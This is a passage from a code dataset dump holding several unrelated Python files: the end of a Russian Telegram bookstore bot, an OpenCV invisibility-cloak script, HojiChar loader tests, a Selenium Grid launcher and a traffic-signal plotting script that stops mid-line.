order[0]:\n flag = True\n break\n if not flag:\n await message.answer(text=f\"Заказа с номером {order_id} нет, попробуйте еще раз\")\n await state.set_state(TrackOrder.choose_order)\n else:\n await state.update_data(order_id=order_id)\n await state.set_state(TrackOrder.track_order)\n await m_track_order(message, state)\n\n\n@dp.message(TrackOrder.track_order)\nasync def m_track_order(message: Message, state: FSMContext):\n data = await state.get_data()\n order_id = data['order_id']\n kb = create_kb()\n order_info = get_info_about_order(order_id)\n order_statuses = {\"new\": \"Новый\", \"paid\": \"Оплаченный\"}\n text = f\"Заказ № {order_id}\\nДата: {order_info[1]}\\nСтатус: {order_statuses[order_info[2]]}\\nСумма заказа: {order_info[-1]} руб\\n\\nДетали:\\n\\n\"\n\n order_items = get_items_by_order_id(order_id)\n for item in order_items:\n item_name, item_quantity, item_summa = item\n text += f\"Товар: {item_name}\\nКоличество: {item_quantity}\\nИтого за товар: {item_summa} руб\\n\\n\"\n\n await message.answer(text=text, reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.track_order)\n\n\n@dp.callback_query(F.data == \"logout\")\nasync def logout(callback: CallbackQuery, state: FSMContext):\n yes_button = KeyboardButton(text='Да')\n cancel_button = KeyboardButton(text='Отмена')\n btns = [[yes_button], [cancel_button]]\n kb = ReplyKeyboardMarkup(resize_keyboard=True, keyboard=btns)\n await callback.message.answer(\"Вы точно хотите выйти из аккаунта?\", reply_markup=kb)\n await state.set_state(Logout.confirm_logout)\n\n\n@dp.message(Logout.confirm_logout)\nasync def choose_quantity(message: Message, state: FSMContext):\n if message.text == \"Да\":\n set_unauthorised(message.from_user.id)\n await message.answer('Выход успешный', reply_markup=types.ReplyKeyboardRemove())\n else:\n await message.answer('Выход отменен', reply_markup=types.ReplyKeyboardRemove())\n await start_command(message, state)\n\n\n@dp.callback_query(F.data == \"check status\")\nasync def check_status(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n order_number = InlineKeyboardButton(text=\"Указать номер заказа\", callback_data=\"input order number\")\n fio = InlineKeyboardButton(text=\"Указать ФИО\", callback_data=\"input fio\")\n kb.add(order_number)\n kb.add(fio)\n kb.adjust(1)\n await callback.message.answer(text=\"Укажите номер заказа или ФИО, на кого оформлен заказ\",\n reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(CheckStatus.input_order_number, F.data == \"back\")\nasync def back_to_check_status(callback: CallbackQuery, state: FSMContext):\n await check_status(callback, state)\n\n\n@dp.callback_query(CheckStatus.input_fio, F.data == \"back\")\nasync def back_to_check_status(callback: CallbackQuery, state: FSMContext):\n await check_status(callback, state)\n\n\n@dp.callback_query(F.data == \"input order number\")\nasync def input_order_number(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите номер заказа\", reply_markup=kb.as_markup())\n await state.set_state(CheckStatus.input_order_number)\n\n\n@dp.callback_query(F.data == \"input fio\")\nasync def input_fio(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите ФИО\", reply_markup=kb.as_markup())\n await state.set_state(CheckStatus.input_fio)\n\n\n@dp.callback_query(F.data == \"check availability\")\nasync def check_availability(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите артикул товара\", reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(F.data == \"how to search\")\nasync def how_to_search(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n buttons = [\n InlineKeyboardButton(text=\"Быстрый поиск по наименованию товара\", callback_data=\"quick search by name\"),\n InlineKeyboardButton(text=\"Поиск по наименованию товара\", callback_data=\"search by name\"),\n InlineKeyboardButton(text=\"Быстрый поиск по артикулу товара\", callback_data=\"quick search by vendor\"),\n InlineKeyboardButton(text=\"Поиск по артикулу товара\", callback_data=\"search by vendor\"),\n InlineKeyboardButton(text=\"Поиск по автору книги\", callback_data=\"search by author\"),\n InlineKeyboardButton(text=\"Поиск по ISBN\", callback_data=\"search by isbn\")]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n\n await callback.message.answer(\"О том, как искать товар можно ознакомиться на сайте: \"\n \"https://www.centrmag.ru/information_pages/poisk/\\n\\nТакже вы можете посмотреть, \"\n \"как искать товар по способам поиска, нажав на соответствующую кнопку\",\n reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(HowToSearch.how_to_search)\nasync def back_to_how_to_search(callback: CallbackQuery, state: FSMContext):\n await how_to_search(callback, state)\n\n\n@dp.callback_query(F.data == \"quick search by name\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_01.png\",\n caption=quick_search_by_name_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by name\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_02.png\",\n caption=search_by_name_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"quick search by vendor\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_01_.png\",\n caption=quick_search_by_vendor_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by vendor\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_02_.png\",\n caption=search_by_vendor_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by author\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_03.png\",\n caption=search_by_author_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by isbn\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_03.png\",\n caption=search_by_isbn_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"grafik raboty\")\nasync def grafik_raboty(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=grafik_raboty_text, parse_mode=ParseMode.HTML, reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(F.data == \"how to get\")\nasync def how_to_get(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n buttons = [\n InlineKeyboardButton(text=\"От станции метро Волоколамская\", callback_data=\"from metro\"),\n InlineKeyboardButton(text=\"От станции МЦД-2 Волоколамская\", callback_data=\"from mcd\"),\n InlineKeyboardButton(text=\"Доехать на автобусе\", callback_data=\"by bus\")]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await callback.message.answer_photo(photo=\"https://imgur.com/a/5FSxMfP\", reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(HowToGet.how_to_get)\nasync def back_to_how_to_get(callback: CallbackQuery, state: FSMContext):\n await how_to_get(callback, state)\n\n\n@dp.callback_query(F.data == \"from metro\")\nasync def from_metro(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=from_metro_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"from mcd\")\nasync def from_mcd(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=from_mcd_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"by bus\")\nasync def by_bus(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=by_bus_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"delivery methods\")\nasync def delivery_methods(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n for i, method in enumerate(delivery_methods_list):\n kb.add(InlineKeyboardButton(text=method, callback_data=str(i)))\n kb.adjust(1)\n await callback.message.answer(text=delivery_methods_text, parse_mode=ParseMode.HTML, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.delivery_methods)\n\n\n@dp.callback_query(DeliveryMethods.method, F.data == \"back\")\nasync def back_to_delivery_methods(callback: CallbackQuery, state: FSMContext):\n await delivery_methods(callback, state)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"0\")\nasync def samovivoz(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=samovivoz_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"1\")\nasync def pvz_i_postamaty(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo='https://imgur.com/a/LRsILZY', caption=pvz_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"2\")\nasync def kurierskaya(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo='https://imgur.com/a/40UlmiC')\n await callback.message.answer(text=kurierskaya_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"3\")\nasync def beskontaktnaya_kurierskaya(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=beskontaktnaya_kurierskaya_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"4\")\nasync def punkti_samovivoza(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=punkti_samovivoza_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"5\")\nasync def kurierskaya_po_vsei_rossii(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=kurierskaya_po_vsei_rossii_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"6\")\nasync def po_pochte(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=po_pochte_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(F.data == \"payment methods\")\nasync def payment_methods(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n for i, method in enumerate(payment_methods_list):\n kb.add(InlineKeyboardButton(text=method, callback_data=str(i)))\n kb.adjust(1)\n await callback.message.answer(text=payment_methods_text, reply_markup=kb.as_markup())\n await state.set_state(PaymentMethods.payment_methods)\n\n\n@dp.callback_query(PaymentMethods.method, F.data == \"back\")\nasync def back_to_payment_methods(callback: CallbackQuery, state: FSMContext):\n await payment_methods(callback, state)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"0\")\nasync def cash_payment(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=cash_payment_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"1\")\nasync def cashless_payment(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=cashless_payment_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"2\")\nasync def transfer_to_bank_card(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=transfer_to_bank_card_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"3\")\nasync def transfer_to_e_wallet_card(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=transfer_to_e_wallet_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"4\")\nasync def money_transfer_systems(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=money_transfer_systems_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"5\")\nasync def payment_terminal(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=payment_terminal_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n# @dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"0\")\n# async def po_pochte(callback: CallbackQuery, state: FSMContext):\n\n\nasync def main() -> None:\n bot = Bot(TOKEN, parse_mode=ParseMode.HTML)\n await dp.start_polling(bot)\n\n\nif __name__ == \"__main__\":\n # logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n asyncio.run(main())\n","repo_name":"mrInsaf/centrmag_new","sub_path":"magbot.py","file_name":"magbot.py","file_ext":"py","file_size_in_byte":34470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43039943501","text":"import cv2\nimport numpy as np\nimport time\n\ncap = cv2.VideoCapture(0)\n\ntime.sleep(3)\ncount = 0\nbackground=0\n\nfor i in range(60):\n\tret,background = cap.read()\n\nwhile(cap.isOpened()):\n\tret, img = cap.read()\n\tif not ret:\n break\n\tcount+=1\n\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n\t# Mask to detect red color\n\tlower_red = np.array([0, 100, 100])\n\tupper_red = np.array([10, 255, 255])\n\tmask1 = cv2.inRange(hsv,lower_red,upper_red)\n\n\tlower_red = np.array([160,100,100])\n\tupper_red = np.array([179,255,255])\n\tmask2 = cv2.inRange(hsv,lower_red,upper_red)\n\n\tmask1 = mask1+mask2\n\n\t# Refining the mask corresponding to the detected red color\n\tmask1 = cv2.morphologyEx(mask1, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\n\tmask1 = cv2.dilate(mask1,np.ones((3,3),np.uint8),iterations = 1)\n\tmask2 = cv2.bitwise_not(mask1)\n\n\t# Generating the final output\n\tres1 = cv2.bitwise_and(background,background,mask=mask1)\n\tres2 = cv2.bitwise_and(img,img,mask=mask2)\n\tfinal_output = cv2.addWeighted(res1,1,res2,1,0)\n\n\tcv2.imshow('Magic !!!',final_output)\n\tk = cv2.waitKey(10)\n\tif k == 27:\n break\n","repo_name":"swarupe/invisibility-cloak","sub_path":"cloak.py","file_name":"cloak.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"42662837784","text":"import os\nimport shutil\nfrom pathlib import Path\n\nimport pytest\n\nfrom hojichar.utils.load_compose import (\n _check_args_num_mismatch,\n _load_module,\n load_compose,\n load_factory_from_file,\n load_filter_from_file,\n load_parametrized_filter_from_file,\n)\n\n\n@pytest.fixture\ndef mock_dir() -> Path:\n mock_dir = Path(__file__).parent / \"mock_profiles\"\n return mock_dir\n\n\ndef test_load_module(mock_dir):\n fpath = mock_dir / \"mock_loading_verification.py\"\n module = _load_module(fpath)\n assert module.IS_LOADED == \"success\"\n\n\ndef test_load_filter_from_file_success(mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n filter = load_filter_from_file(fpath)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_module_load_another(mock_dir):\n # HACK doctest loads *.py file and cause ModuleNotFoundError.\n original = mock_dir / \"mock_filter_load_another_module\"\n fpath = mock_dir / \"mock_filter_load_another_module.py\"\n shutil.copyfile(original, fpath)\n filter = load_filter_from_file(fpath)\n assert filter(\"\") == \"success\"\n os.remove(fpath)\n\n\ndef test_load_filter_from_file_notimplemented(mock_dir):\n fpath = mock_dir / \"mock_filter_notimplemented.py\"\n with pytest.raises(NotImplementedError) as e:\n load_filter_from_file(fpath)\n assert str(e.value) == \"FILTER is not defined in the profile.\"\n\n\ndef test_load_filter_from_file_typeerror(mock_dir):\n fpath = mock_dir / \"mock_filter_typeerror.py\"\n with pytest.raises(TypeError) as e:\n load_filter_from_file(fpath)\n assert str(e.value) == \"FILTER must be hojichar.Compose object.\"\n\n\ndef test_load_factory_from_file_success(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n factory = load_factory_from_file(fpath)\n filter = factory(\"success\")\n assert filter(\"\") == \"success\"\n\n\ndef test_load_factory_from_file_notimplemented(mock_dir):\n fpath = mock_dir / \"mock_factory_notimplemented.py\"\n with pytest.raises(NotImplementedError) as e:\n load_factory_from_file(fpath)\n assert str(e.value) == \"FACTORY is not defined in the profile\"\n\n\ndef test_load_parametrized_filter_0args(mock_dir):\n fpath = mock_dir / \"mock_factory_0args.py\"\n args = tuple([])\n filter = load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_parametrized_filter_1args(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n args = tuple([\"success\"])\n filter = load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_parametrized_filter_2args(mock_dir):\n fpath = mock_dir / \"mock_factory_2args.py\"\n args = tuple([\"arg1\", \"arg2\"])\n filter = load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"arg1+arg2\"\n\n\ndef test_load_compose_filter(mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n filter = load_compose(fpath)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_compose_filter_unnecessary_args(caplog, mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n args = tuple([\"arg1\", \"arg2\"])\n filter = load_compose(fpath, *args)\n assert filter(\"\") == \"success\"\n assert \"Warning: 2 arguments are ignored.\" in caplog.text\n\n\ndef test_load_compose_factory(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n args = tuple([\"success\"])\n filter = load_compose(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_check_args_num_mismatch(caplog):\n _check_args_num_mismatch(3)\n assert \"Warning: 3 arguments are ignored.\" in caplog.text\n","repo_name":"HojiChar/HojiChar","sub_path":"tests/utils/test_load_compose.py","file_name":"test_load_compose.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"99"} +{"seq_id":"11184829002","text":"from questions_three.exceptions import InvalidConfiguration\nfrom questions_three.module_cfg import config_for_module\nfrom twin_sister import dependency\nfrom selenium import webdriver\n\n\ndef launch_selenium_grid_browser():\n config = config_for_module(__name__)\n hub_url = config.selenium_grid_hub_url\n if not hub_url:\n raise InvalidConfiguration(\"Expected $SELENIUM_GRID_HUB_URL to be configured.\")\n caps = {\"browserName\": config.use_browser}\n if config.use_browser:\n caps[\"browserName\"] = config.use_browser\n browser_version = config.use_browser_version\n if browser_version:\n caps[\"version\"] = browser_version\n return dependency(webdriver).Remote(command_executor=hub_url, desired_capabilities=caps)\n","repo_name":"CyberGRX/questions-three","sub_path":"optional_packages/selenium/questions_three_selenium/browser/selenium_grid.py","file_name":"selenium_grid.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"20673841666","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n'''\n# TRENDS IN MINIMUM GREEN TIME\n\navg_ql = np.array([6.83, 7.51, 3.85, 7.29, -0.88, 0.30, 0.31, 0.35, 2.79, -3.07, -2.53])\n\navg_qt = np.array([-5.19, 15.06, 16.23, 12.36, 10.58, 14.01, 2.08, 6.56, 14.59, 15.19, 14.77])\n\navg_flow = np.array([1.27, 1.24, 1.29, 1.19, 1.01, 1.02, 0.84, 0.87, 0.89, 1.17, 1.28])\n\nu_min = np.array([10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40])\n\nplt.figure()\nplt.plot(u_min, avg_ql, \"b\")\nplt.title(\"Average Queue Length Improvement vs. Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Queue Length (%)\")\nplt.axhline(0, color='black', linewidth=.5)\nplt.xlim(10)\nplt.ylim(-5, 10)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(u_min, avg_qt, \"b\")\nplt.title(\"Average Queue Time Improvement vs. Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Queue Time (%)\")\nplt.axhline(0, color='black', linewidth=.5)\nplt.xlim(10)\nplt.ylim(-7, 20)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(u_min, avg_flow, \"b\")\nplt.title(\"Average Flow Rate Improvement vs. Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Flow Rate (%)\")\nplt.xlim(10)\nplt.ylim(0, 4)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\n#plt.show()\n\n# SYSTEM STATE TRAJECTORY\n\ndef plot_line_2_params(x, y1, y2, xlabel, ylabel, y1_label, y2_label, title):\n\n plt.figure()\n plt.stem(x, y1, \"g-\", label=y1_label)\n plt.stem(x, y2, \"r-\", label=y2_label)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.xlim(0)\n plt.ylim(0)\n plt.legend()\n plt.gcf().autofmt_xdate()\n\n# Post process average queue length into per hour data\ndef post_proc_demand(step_size, hrs, directory):\n\n # Reading data from the xml file\n with open(directory, \"r\") as f:\n data = f.read()\n\n soup = BeautifulSoup(data, \"xml\")\n print(\"Successfully parsed the summary file of inserted vehicles\")\n\n f.close()\n\n hourly_demand = [0.0]\n\n steps = soup.find_all(\"step\")\n\n steps_per_s = int(1/step_size)\n #total_steps = (hrs+1)*3600*steps_per_s\n\n j = 1\n\n for i in range(len(steps)):\n\n time = float(steps[i]['time'])\n if time%3600.0 != 0 or time == 0:\n continue\n\n inserted_vehs = float(steps[i][\"inserted\"])\n if len(hourly_demand) > 1:\n hourly_demand.append(inserted_vehs-sum(hourly_demand[:j]))\n else:\n hourly_demand.append(inserted_vehs)\n j += 1\n print(f\"hourly_demand = {hourly_demand}\")\n return hourly_demand\n\n# Actual hourly traffic demand from MMDA data\ndemand_actual = [0, 8491, 9618, 10305, 7898, 7271, 6654, 6585, 8381, 8106, 8871, 9462, 10776, 9620, 8499]\n\nsim_hr = [\"6:00\", \"7:00\", \"8:00\", \"9:00\", \"10:00\", \"11:00\", \"12:00\", \"13:00\", \"14:00\", \"15:00\", \"16:00\", \"17:00\", \"18:00\", \"19:00\", \"20:00\"]\n\ndemand_mpc = post_proc_demand(0.5, 14, \"results\\\\summary_003_mpc.xml\")\n\nplot_line_2_params(sim_hr, demand_mpc, demand_actual, \"Time of Day (hr:min)\", \"Number of Vehicles\", \"Simulator-generated demand\", \"Actual demand\", \"Hourly Traffic in the Intersection for MPC-based TSC Simulation\")\n\nplt.show()\n'''\n\n'''\nC = 75\nk = np.arange(0,C*12,1)\n\ntrajectory_katip_s = [14, 14, 14, 14, 14, 13, 13, 13, 13, 13, 13, 13]\ntrajectory_katip_n = [34, 39, 44, 49, 54, 59, 64, 69, 74, 79, 84, 89]\ntrajectory_aurora_w = [15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]\ntrajectory_aurora_e_w = [50, 57, 64, 70, 77, 84, 91, 98, 104, 111, 118, 125]\ntrajectory_aurora_e_katip_s = [8,9,10,11,12,13,14,15,17,18,19,20,22]\n\nactual_katip_s = [14, 12, 11, 12, 12, 15, 13, 11, 12, 14, 10, 10]\nactual_katip_n = [34, 38, 46, 50, 5, 54, 59, 57, 61, 66, 52, 45]\nactual_aurora_w = [15, 22, 21, 20, 21, 20, 20, 22, 23, 20, 18, 21]\nactual_aurora_e_w = [50, 75, 78, 80, 80, 78, 80, 78, 77, 76, 86, 109]\nactual_aurora_e_katip_s = [8, 12, 13, 14, 14, 12, 12, 12, 11, 10, 8, 15]\n\ntrajectory_katip_s_new = []\ntrajectory_katip_n_new = []\ntrajectory_aurora_w_new = []\ntrajectory_aurora_e_w_new = []\ntrajectory_aurora_e_katip_s_new = []\n\nactual_katip_s_new = []\nactual_katip_n_new = []\nactual_aurora_w_new = []\nactual_aurora_e_w_new = []\nactual_aurora_e_katip_s_new = []\nfor i in range(12):\n\n trajectory_katip_s_new += [trajectory_katip_s[i]]*C\n trajectory_katip_n_new += [trajectory_katip_n[i]]*C\n trajectory_aurora_w_new += [trajectory_aurora_w[i]]*C\n trajectory_aurora_e_w_new += [trajectory_aurora_e_w[i]]*C\n trajectory_aurora_e_katip_s_new += [trajectory_aurora_e_katip_s[i]]*C\n\n actual_katip_s_new += [actual_katip_s[i]]*C\n actual_katip_n_new += [actual_katip_n[i]]*C\n actual_aurora_w_new += [actual_aurora_w[i]]*C\n actual_aurora_e_w_new += [actual_aurora_e_w[i]]*C\n actual_aurora_e_katip_s_new +=[actual_aurora_e_katip_s[i]]*C\n\nplt.figure()\nplt.plot(k, trajectory_katip_s_new, \"g--\", label=\"Predicted\")\nplt.plot(k, actual_katip_s_new, \"g\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Katipuan Ave. South, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_katip_s_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_katip_n_new, \"r--\", label=\"Predicted\")\nplt.plot(k, actual_katip_n_new, \"r\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Katipuan Ave. North, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_katip_n_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_w_new, \"m--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_w_new, \"m\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. West, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_w_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_e_w_new, \"c--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_e_w_new, \"c\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. East Lanes 1-3, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_e_w_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_e_katip_s_new, \"k--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_e_katip_s_new, \"k\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. Lane 4, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_e_katip_s_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\n#plt.xlim(10)\n#plt.ylim(-7, 20)\n\nplt.show()\n'''\n\n# Plot Fixed-time TSC vs MPC-based TSC for lower cycle times\nfixed_time_perf_ql = [11.67973289,13.55946825,15.9475019,18.53459987,28.7639795]\nmpc_based_perf_ql = [11.03484458,13.23660218,15.05267055,16.68893072,27.02271858]\nfixed_time_perf_qt = [22.37023087,22.91194918,25.17958151,27.77935478,33.74459006]\nmpc_based_perf_qt = [20.09391631,20.46026922,22.1784476,23.9712574,30.09917043]\nfixed_time_perf_flow = [8467.785714,8495.5,8523.785714,8535.357143,8595.2857143]\nmpc_based_perf_flow = [8549.7857143,8601.6428571,8631.7857143,8661.8571429,8687.7857143]\n\ncycle_times = [70, 80, 90, 100, 154]\nwidth = 4.5\n\n# Plot Fixed-time TSC vs MPC-based TSC for different demand profiles\nfixed_time_profile_1 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_1 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_2 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_2 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_3 = 